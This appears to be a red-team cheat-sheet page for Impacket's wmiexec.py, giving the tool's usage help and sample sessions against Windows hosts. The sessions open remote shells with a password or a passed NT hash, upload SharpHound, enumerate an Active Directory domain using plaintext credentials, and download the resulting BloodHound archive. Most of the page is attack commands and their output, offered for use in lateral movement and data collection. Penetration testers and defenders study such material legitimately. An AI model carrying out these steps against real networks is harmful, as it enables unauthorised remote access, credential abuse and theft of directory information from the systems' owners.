Executes a semi-interactive shell using Windows Management Instrumentation.
Install Impacket.
wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand] [-debug] [-codec CODEC] [-shell-type {cmd,powershell}] [-com-version MAJOR_VERSION:MINOR_VERSION] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-target-ip ip address] [-A authfile] [-keytab KEYTAB]
target [command ...]
Impacket v0.12.0.dev1+20240718.115833.4e0e3174 - Copyright 2023 Fortra
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
command command to execute at the target. If empty it will launch a semi-interactive shell
options:
-h, --help show this help message and exit
-share SHARE share where the output will be grabbed from (default ADMIN$)
-nooutput whether or not to print the output (no SMB connection created)
-ts Adds timestamp to every logging output
-silentcommand does not execute cmd.exe to run given command (no output)
-debug Turn DEBUG output ON
-codec CODEC Sets encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-com-version MAJOR_VERSION:MINOR_VERSION
DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
-A authfile smbclient/mount.cifs-style authentication file. See smbclient man page's -A option.
-keytab KEYTAB Read keys for SPN from keytab file
$ wmiexec.py offsec.nl/administrator:[email protected]
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
offsec\administrator
wmiexec.py [email protected] -hashes :0e0363213e37b94221497260b0bcb4fc Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
$ wmiexec.py admin:[email protected]
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
put[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>put SharpHound.exe
[*] Uploading SharpHound.exe to C:\SharpHound.exe
C:\>SharpHound.exe --CollectionMethod All -d offsec.local --ldapusername johndo --ldappassword Welkom1234 --domaincontroller 10.10.10.10
------------------------------------------------
Initializing SharpHound at 10:59 AM on 11/5/2020
------------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain offsec.LOCAL using path CN=Schema,CN=Configuration,DC=offsec,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 18 MB RAM
Status: 74 objects finished (+74 74)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.6392385
Compressing data to .\20201105105903_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 10:59 AM on 11/5/2020! Happy Graphing!
C:\>get 20201105105903_BloodHound.zip
[*] Downloading C:\\20201105105903_BloodHound.zip